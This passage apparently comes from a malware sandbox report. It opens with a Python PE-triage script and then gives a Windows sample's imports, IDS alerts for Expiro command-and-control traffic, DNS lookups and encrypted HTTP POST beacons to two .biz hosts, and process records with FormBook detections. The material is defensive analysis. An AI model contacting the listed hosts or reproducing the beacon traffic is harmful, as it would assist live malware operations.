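IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
DIR_BASERELOC = 5          # index into the optional header's data directories


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_pointer: int
    characteristics: int


@dataclass
class PEInfo:
    machine: int
    timestamp: int
    directories: List[Tuple[int, int]]   # (virtual address, size), 16 entries
    sections: List[Section]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, as in the Entropy column above."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(buf: bytes) -> PEInfo:
    """Minimal parser: DOS header -> PE signature -> COFF header -> data directories -> sections."""
    if buf[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", buf, opt)[0]
    dir_off = opt + (96 if magic == 0x10B else 112)            # PE32 vs PE32+ optional header
    directories = [struct.unpack_from("<II", buf, dir_off + 8 * i) for i in range(16)]
    sections = []
    for i in range(nsections):
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", buf, opt + opt_size + 40 * i)
        sections.append(Section(name.rstrip(b"\x00").decode("ascii", "replace"),
                                vsize, va, rsize, rptr, chars))
    return PEInfo(machine, timestamp, directories, sections)


def compile_time(pe: PEInfo) -> str:
    """TimeDateStamp as an ISO-8601 UTC string, the value shown in the Time Stamp row."""
    return datetime.fromtimestamp(pe.timestamp, tz=timezone.utc).isoformat()


def triage_sections(buf: bytes, pe: PEInfo, entropy_threshold: float = 7.0) -> List[str]:
    """Flag W+X sections, high-entropy sections, and a .reloc the BASERELOC directory ignores."""
    findings = []
    reloc_va, reloc_size = pe.directories[DIR_BASERELOC]
    for s in pe.sections:
        raw = buf[s.raw_pointer:s.raw_pointer + s.raw_size]
        ent = shannon_entropy(raw)
        if s.characteristics & IMAGE_SCN_MEM_WRITE and s.characteristics & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"{s.name}: writable and executable")
        if ent >= entropy_threshold:
            findings.append(f"{s.name}: entropy {ent:.2f} over {len(raw)} raw bytes")
        if s.name == ".reloc":
            span = max(s.virtual_size, s.raw_size)
            if reloc_size == 0 or not (s.virtual_address <= reloc_va < s.virtual_address + span):
                findings.append(".reloc: base-relocation directory does not point into it")
    return findings


def build_sample_pe() -> bytes:
    """Constructed PE32 shaped like the table above: a repetitive .text, a pseudo-random RWX
    .reloc, every data directory zero (so BASERELOC is empty) and the report's timestamp."""
    rng = random.Random(1588299)
    text = (b"\x55\x8b\xec\x33\xc0\x5d\xc3" + b"\xcc" * 9) * 256          # 4 KiB, low entropy
    blob = bytes(rng.getrandbits(8) for _ in range(8192))                 # 8 KiB, near 8 bits
    layout = [
        (b".text", 0x1000, text, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".reloc", 0x3000, blob, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE
         | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)                   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0x6756D4C9, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                                   # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 28, 0x400000)                              # ImageBase
    raw_ptr, table, body = 0x400, b"", b""
    for name, va, data, chars in layout:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)
        body += data
        raw_ptr += len(data)
    return (dos + b"PE\x00\x00" + coff + bytes(opt) + table).ljust(0x400, b"\x00") + body
```

On the real file, parse_pe and triage_sections would report all three findings for .reloc and only the entropy finding for .rsrc (7.89 bits, read-only), and compile_time would return 2024-12-09T11:30:17+00:00, the same instant the Time Stamp row decodes to.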
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x4edea | data | (none) | (none) | 1.0003281225816436
RT_GROUP_ICON | 0x11e5a4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11e61c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11e630 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11e644 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11e658 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11e734 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
Note: the one RT_RCDATA entry (0x4edea bytes, no language, ZLIB complexity above 1.0, i.e. incompressible) is where a compiled AutoIt binary keeps its compressed script; if the "compiled AutoIt script" identification in the overview holds, that resource, not the icon, string and manifest boilerplate around it, is the part to extract and decompile. The "Matlab v4 mat-file" type on one string table is a libmagic misidentification.
                    DLLImport
                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                    PSAPI.DLLGetProcessMemoryInfo
                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                    UxTheme.dllIsThemeActive
                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, 
VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                    USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                    GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                    COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
                    ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                    SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                    ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                    OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                    Language of compilation system | Country where language is spoken
                    English | Great Britain
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2025-01-10T23:40:54.311918+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.8 | 49704 | 54.244.188.177 | 80 | TCP
                    2025-01-10T23:40:54.447678+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.8 | 49704 | TCP
                    2025-01-10T23:40:54.447678+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.8 | 49704 | TCP
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jan 10, 2025 23:40:53.605201960 CET | 49704 | 80 | 192.168.2.8 | 54.244.188.177
                    Jan 10, 2025 23:40:53.610069036 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.8
                    Jan 10, 2025 23:40:53.610153913 CET | 49704 | 80 | 192.168.2.8 | 54.244.188.177
                    Jan 10, 2025 23:40:53.610929012 CET | 49704 | 80 | 192.168.2.8 | 54.244.188.177
                    Jan 10, 2025 23:40:53.610950947 CET | 49704 | 80 | 192.168.2.8 | 54.244.188.177
                    Jan 10, 2025 23:40:53.615739107 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.8
                    Jan 10, 2025 23:40:53.615782976 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.8
                    Jan 10, 2025 23:40:54.311741114 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.8
                    Jan 10, 2025 23:40:54.311844110 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.8
                    Jan 10, 2025 23:40:54.311918020 CET | 49704 | 80 | 192.168.2.8 | 54.244.188.177
                    Jan 10, 2025 23:40:54.442912102 CET | 49704 | 80 | 192.168.2.8 | 54.244.188.177
                    Jan 10, 2025 23:40:54.447678089 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.8
                    Jan 10, 2025 23:40:54.493932962 CET | 49705 | 80 | 192.168.2.8 | 18.141.10.107
                    Jan 10, 2025 23:40:54.498838902 CET | 80 | 49705 | 18.141.10.107 | 192.168.2.8
                    Jan 10, 2025 23:40:54.499140978 CET | 49705 | 80 | 192.168.2.8 | 18.141.10.107
                    Jan 10, 2025 23:40:54.612068892 CET | 49705 | 80 | 192.168.2.8 | 18.141.10.107
                    Jan 10, 2025 23:40:54.612068892 CET | 49705 | 80 | 192.168.2.8 | 18.141.10.107
                    Jan 10, 2025 23:40:54.616995096 CET | 80 | 49705 | 18.141.10.107 | 192.168.2.8
                    Jan 10, 2025 23:40:54.617012978 CET | 80 | 49705 | 18.141.10.107 | 192.168.2.8
                    Jan 10, 2025 23:40:55.033266068 CET | 49705 | 80 | 192.168.2.8 | 18.141.10.107
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jan 10, 2025 23:40:53.549143076 CET | 51890 | 53 | 192.168.2.8 | 1.1.1.1
                    Jan 10, 2025 23:40:53.556240082 CET | 53 | 51890 | 1.1.1.1 | 192.168.2.8
                    Jan 10, 2025 23:40:54.454590082 CET | 52530 | 53 | 192.168.2.8 | 1.1.1.1
                    Jan 10, 2025 23:40:54.464338064 CET | 53 | 52530 | 1.1.1.1 | 192.168.2.8
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Jan 10, 2025 23:40:53.549143076 CET | 192.168.2.8 | 1.1.1.1 | 0xe06b | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
                    Jan 10, 2025 23:40:54.454590082 CET | 192.168.2.8 | 1.1.1.1 | 0x9763 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Jan 10, 2025 23:40:53.556240082 CET | 1.1.1.1 | 192.168.2.8 | 0xe06b | No error (0) | pywolwnvd.biz | (none) | 54.244.188.177 | A (IP address) | IN (0x0001) | false
                    Jan 10, 2025 23:40:54.464338064 CET | 1.1.1.1 | 192.168.2.8 | 0x9763 | No error (0) | ssbzmoy.biz | (none) | 18.141.10.107 | A (IP address) | IN (0x0001) | false
                    • pywolwnvd.biz
                    • ssbzmoy.biz
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.8 | 49704 | 54.244.188.177 | 80 | 4452 | C:\Users\user\Desktop\LiuUGJK9vH.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jan 10, 2025 23:40:53.610929012 CET | 349 | OUT | POST /hdjf HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    Host: pywolwnvd.biz
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                    Content-Length: 802
                    Jan 10, 2025 23:40:53.610950947 CET | 802 | OUT | Data Raw: 08 c1 b9 99 0d 24 7a d8 16 03 00 00 df f2 4d fc d3 a2 a1 05 fc 01 78 b3 bb 50 d2 04 20 2a 3b b6 f5 f7 37 a3 2d 60 27 49 d3 44 09 57 c2 07 e5 39 86 ad 13 78 f1 8a ba e7 98 60 3e 79 3b 69 01 c1 29 ea 3f dd 9a 19 77 06 ee cb e6 37 38 73 f4 8f 83 08
                    Data Ascii: $zMxP *;7-`'IDW9x`>y;i)?w78s*vi&V(=S0b`zN]Wu.74PqJNMi63@+9'%q{`3f"=jtL05 g;)=rX[ks0E`~x
                    Jan 10, 2025 23:40:54.311741114 CET | 413 | IN | HTTP/1.1 200 OK
                    Server: nginx
                    Date: Fri, 10 Jan 2025 22:40:54 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Set-Cookie: btst=33d1484f22f0d711475b852d9d00310b|8.46.123.189|1736548854|1736548854|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.8 | 49705 | 18.141.10.107 | 80 | 4452 | C:\Users\user\Desktop\LiuUGJK9vH.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jan 10, 2025 23:40:54.612068892 CET | 346 | OUT | POST /rai HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    Host: ssbzmoy.biz
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                    Content-Length: 802
                    Jan 10, 2025 23:40:54.612068892 CET | 802 | OUT | Data Raw: 9a 05 ed 2b 44 6c cc 99 16 03 00 00 35 3e 9b 19 32 3f 7d 7e ea 92 2f 70 99 66 6f 1e d1 37 ee ce 4f b2 71 95 8d 8e a9 5a e1 d3 2f c5 6b a4 24 d9 71 e9 1b 02 d8 fc 7e fa 1a 3e 6c c2 57 b8 9a 63 04 be 05 09 e9 5f df 47 e5 29 4f bd fd 3b 6f 86 a7 08
                    Data Ascii: +Dl5>2?}~/pfo7OqZ/k$q~>lWc_G)O;oW8*]^(]Wc$6u_D%*Ju1X_l8*LvE?nsT'IMGC>O{ML\{Ns<`I`IcR)dacxJWXDT1H


                    Target ID:0
                    Start time:17:40:51
                    Start date:10/01/2025
                    Path:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\LiuUGJK9vH.exe"
                    Imagebase:0x400000
                    File size:1'761'792 bytes
                    MD5 hash:690A2CBB7F785F6F90A0B510F31D40DE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:17:40:51
                    Start date:10/01/2025
                    Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                    Imagebase:0x400000
                    File size:1'658'880 bytes
                    MD5 hash:1E28FD404AAE9396AA5D6A1141873E0E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:false

                    Target ID:3
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\alg.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\alg.exe
                    Imagebase:0x140000000
                    File size:1'594'368 bytes
                    MD5 hash:01FCE6399A1AC48F9D7931507B2534BB
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:false

                    Target ID:4
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\SysWOW64\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\LiuUGJK9vH.exe"
                    Imagebase:0x6e0000
                    File size:46'504 bytes
                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\drivers\AppVStrm.sys
                    Wow64 process (32bit):
                    Commandline:
                    Imagebase:
                    File size:138'056 bytes
                    MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                    Has elevated privileges:
                    Has administrator privileges:
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:6
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\drivers\AppvVemgr.sys
                    Wow64 process (32bit):
                    Commandline:
                    Imagebase:
                    File size:174'408 bytes
                    MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                    Has elevated privileges:
                    Has administrator privileges:
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:7
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\drivers\AppvVfs.sys
                    Wow64 process (32bit):
                    Commandline:
                    Imagebase:
                    File size:154'952 bytes
                    MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                    Has elevated privileges:
                    Has administrator privileges:
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:8
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\AppVClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\AppVClient.exe
                    Imagebase:0x140000000
                    File size:1'348'608 bytes
                    MD5 hash:04218364223ED3D355D0195140331BD0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
